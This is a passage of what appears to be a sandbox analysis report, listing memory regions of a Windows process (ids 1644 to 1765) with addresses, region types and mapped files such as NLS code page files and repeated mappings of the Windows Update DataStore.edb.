0x5a50000 end_va = 0x5a50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 1644 start_va = 0x5a60000 end_va = 0x5a60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a60000" filename = "" Region: id = 1645 start_va = 0x5a70000 end_va = 0x5a7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1646 start_va = 0x5a80000 end_va = 0x5a8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1647 start_va = 0x5a90000 end_va = 0x5aa0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 1648 start_va = 0x5ab0000 end_va = 0x5ac0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 1649 start_va = 0x5ad0000 end_va = 0x5ae0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 1650 start_va = 0x5af0000 end_va = 0x5afffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1651 start_va = 0x5b00000 end_va = 0x5bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b00000" filename = "" Region: id = 1652 start_va = 0x5c00000 end_va = 0x5cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c00000" filename = "" Region: id = 1653 start_va = 0x5d00000 end_va = 0x5d0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1654 start_va = 0x5d10000 end_va = 0x5d1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1655 start_va = 0x5e00000 end_va = 0x5efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e00000" filename = "" Region: id = 1656 start_va = 0x5f00000 end_va = 0x5f10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 1657 start_va = 0x5f20000 end_va = 0x5f30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 1658 start_va = 0x5f40000 end_va = 0x5f50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 1659 start_va = 0x5f60000 end_va = 0x5f70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 1660 start_va = 0x5f80000 end_va = 0x5fa7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 1661 start_va = 0x5fb0000 end_va = 0x5fbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1662 start_va = 0x5fc0000 end_va = 0x5fc6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 1663 start_va = 0x5fd0000 end_va = 0x60cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fd0000" filename = "" Region: id = 1664 start_va = 0x60d0000 end_va = 0x60e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 1665 start_va = 0x60f0000 end_va = 0x60fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1666 start_va = 0x6100000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 1667 start_va = 0x6200000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 1668 start_va = 0x6300000 end_va = 0x63fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 1669 start_va = 0x6400000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 1670 start_va = 0x6500000 end_va = 0x65fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 1671 start_va = 0x6600000 end_va = 0x66fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006600000" filename = "" Region: id = 1672 start_va = 0x6700000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006700000" filename = "" Region: id = 1673 start_va = 0x6800000 end_va = 0x687ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 1674 start_va = 0x6880000 end_va = 0x688ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1675 start_va = 0x6890000 end_va = 0x689ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1676 start_va = 0x68a0000 end_va = 0x68affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1677 start_va = 0x68b0000 end_va = 0x68bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1678 start_va = 0x68c0000 end_va = 0x68cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1679 start_va = 0x68d0000 end_va = 0x68dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1680 start_va = 0x68e0000 end_va = 0x68effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1681 start_va = 0x68f0000 end_va = 0x68fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1682 start_va = 0x6900000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 1683 start_va = 0x6a00000 end_va = 0x6afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 1684 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 1685 start_va = 0x6c00000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 1686 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 1687 start_va = 0x6e00000 end_va = 0x6efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 1688 start_va = 0x6f00000 end_va = 0x6f0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1689 start_va = 0x6f10000 end_va = 0x6f1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1690 start_va = 0x6f20000 end_va = 0x6f2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1691 start_va = 0x6f30000 end_va = 0x6f3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1692 start_va = 0x6f40000 end_va = 0x6f4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1693 start_va = 0x6f50000 end_va = 0x6f5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1694 start_va = 0x6f60000 end_va = 0x6f6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1695 start_va = 0x6f70000 end_va = 0x6f7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1696 start_va = 0x6f80000 end_va = 0x6f8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1697 start_va = 0x6f90000 end_va = 0x6f9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1698 start_va = 0x6fa0000 end_va = 0x6faffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1699 start_va = 0x6fb0000 end_va = 0x6fbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1700 start_va = 0x6fc0000 end_va = 0x6fcffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1701 start_va = 0x6fd0000 end_va = 0x6fdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1702 start_va = 0x6fe0000 end_va = 0x6feffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1703 start_va = 0x6ff0000 end_va = 0x6ffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1704 start_va = 0x7000000 end_va = 0x70fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007000000" filename = "" Region: id = 1705 start_va = 0x7100000 end_va = 0x71fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007100000" filename = "" Region: id = 1706 start_va = 0x7200000 end_va = 0x7230fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 1707 start_va = 0x7240000 end_va = 0x7250fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 1708 start_va = 0x7260000 end_va = 0x7290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 1709 start_va = 0x72a0000 end_va = 0x72d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 1710 start_va = 0x72e0000 end_va = 0x72effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1711 start_va = 0x72f0000 end_va = 0x72fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1712 start_va = 0x7300000 end_va = 0x73fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007300000" filename = "" Region: id = 1713 start_va = 0x7400000 end_va = 0x74fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007400000" filename = "" Region: id = 1714 start_va = 0x7500000 end_va = 0x75fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007500000" filename = "" Region: id = 1715 start_va = 0x7600000 end_va = 0x760ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1716 start_va = 0x7610000 end_va = 0x761ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1717 start_va = 0x7620000 end_va = 0x762ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1718 start_va = 0x7630000 end_va = 0x763ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1719 start_va = 0x7640000 end_va = 0x764ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1720 start_va = 0x7650000 end_va = 0x765ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1721 start_va = 0x7660000 end_va = 0x766ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1722 start_va = 0x7670000 end_va = 0x767ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1723 start_va = 0x7680000 end_va = 0x768ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1724 start_va = 0x7690000 end_va = 0x769ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1725 start_va = 0x76a0000 end_va = 0x76affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1726 start_va = 0x76b0000 end_va = 0x76bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1727 start_va = 0x76c0000 end_va = 0x76cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1728 start_va = 0x76d0000 end_va = 0x76dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1729 start_va = 0x76e0000 end_va = 0x76effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1730 start_va = 0x76f0000 end_va = 0x76fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1731 start_va = 0x7700000 end_va = 0x770ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1732 start_va = 0x7710000 end_va = 0x771ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1733 start_va = 0x7720000 end_va = 0x772ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1734 start_va = 0x7730000 end_va = 0x773ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1735 start_va = 0x7740000 end_va = 0x774ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1736 start_va = 0x7750000 end_va = 0x775ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1737 start_va = 0x7760000 end_va = 0x776ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1738 start_va = 0x7770000 end_va = 0x777ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1739 start_va = 0x7780000 end_va = 0x778ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1740 start_va = 0x7790000 end_va = 0x779ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1741 start_va = 0x77a0000 end_va = 0x77affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1742 start_va = 0x77b0000 end_va = 0x77bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1743 start_va = 0x77c0000 end_va = 0x77cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1744 start_va = 0x77d0000 end_va = 0x77dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1745 start_va = 0x77e0000 end_va = 0x77effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1746 start_va = 0x77f0000 end_va = 0x77fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1747 start_va = 0x7800000 end_va = 0x780ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1748 start_va = 0x7810000 end_va = 0x781ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1749 start_va = 0x7820000 end_va = 0x782ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1750 start_va = 0x7830000 end_va = 0x792ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007830000" filename = "" Region: id = 1751 start_va = 0x7930000 end_va = 0x793ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1752 start_va = 0x7940000 end_va = 0x794ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1753 start_va = 0x7950000 end_va = 0x795ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1754 start_va = 0x7960000 end_va = 0x796ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1755 start_va = 0x7970000 end_va = 0x797ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1756 start_va = 0x7980000 end_va = 0x798ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1757 start_va = 0x7990000 end_va = 0x799ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1758 start_va = 0x79a0000 end_va = 0x79affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1759 start_va = 0x79b0000 end_va = 0x79bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1760 start_va = 0x79c0000 end_va = 0x79cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1761 start_va = 0x79d0000 end_va = 0x79dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1762 start_va = 0x79e0000 end_va = 0x79effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1763 start_va = 0x79f0000 end_va = 0x79fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1764 start_va = 0x7a00000 end_va = 0x7a0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1765 start_va = 0x7a10000 end_va = 